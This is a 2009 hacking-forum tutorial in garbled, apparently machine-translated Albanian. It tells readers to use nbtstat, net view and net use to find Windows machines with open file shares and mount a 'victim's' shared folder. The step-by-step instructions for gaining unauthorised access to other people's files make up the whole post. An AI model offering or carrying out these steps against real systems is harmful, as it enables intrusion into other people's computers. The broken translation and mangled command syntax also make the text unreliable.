Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Sulmo IP permes DOS-it

Shko poshtë 
AutoriMesazh
Armend
Admin
Admin
avatar

Numri i postimeve : 433
Poenat e Antarit : 1591
Thanks : 16
Join date : 24/03/2009
Age : 26
Location : Kosova, Prishtin

MesazhTitulli: Sulmo IP permes DOS-it   Thu Apr 02, 2009 8:12 pm

Kliko Start -> Run -> cmd


Lloji vijuese në Dos Prompt


-A Nbtstat IP adresa [p.sh.: nbtstat-A 207.175.1.1]


Kjo do t\'ju japë një lexoni se duket si kjo
NetBIOS Remote Machine Name Tabela

____________________________________
Name Type Status
------------------------------------
abhi <00> Unique Registered
PUNA <00> Regjistruar GRUPE
abhi <03> Unique Registered
abhi <20> Unique Registered
PUNA <1E> Regjistruar GRUPE
PUNA <1d> Unique Registered
__MSBROWSE__. <01> Regjistruar GRUPE
____________________________________

Numrat në <> magjistare kodi janë vlerat. Ajo që ne po
interesuar në të është \"Kodi magjistare\" numri i <20>.
Një magji e kodit <20> do të thotë që ju kanë fotografi dhe u kthye në printer sharing.


Hapi tjetër është për të gjetur atë që është e përbashkët. Kjo është se si: --


Net view \\ \\
[e.g: net view \\ \\ 207.175.1.1]


Ju pastaj do të merrni një përgjigje se duket diçka e tillë.
Përbashkët të burimeve në \\ \\ ip_address
Lloji Sharename Koment

________________________________
MY DOCUMENTS Disk TEMP Disk
________________________________


(I komandës u përfundua me sukses.)

Kjo tregon se ju ka viktima potenciale tuaj tyre e mia
Dokumentet Dosjen e tyre të përbashkët dhe e përkohshme për të përbashkët.
Për atëherë ju duhet të merrni qasje në këto dosje e ardhshëm do të komandës.

Net përdorimin x: \\ \\ \\ temp
[e.g: neto përdorimin x: \\ \\ 207.175.1.1 \\ temp]

Nëse të gjitha shkon mirë për ju, pastaj ju do të merrni një përgjigje të
(I komandës u përfundua me sukses.)
Open my computer tuaj ju do të shihni viktimë e temp folder atje...


mad eBy Armend
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://drenica.albanianforum.net
 
Sulmo IP permes DOS-it
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: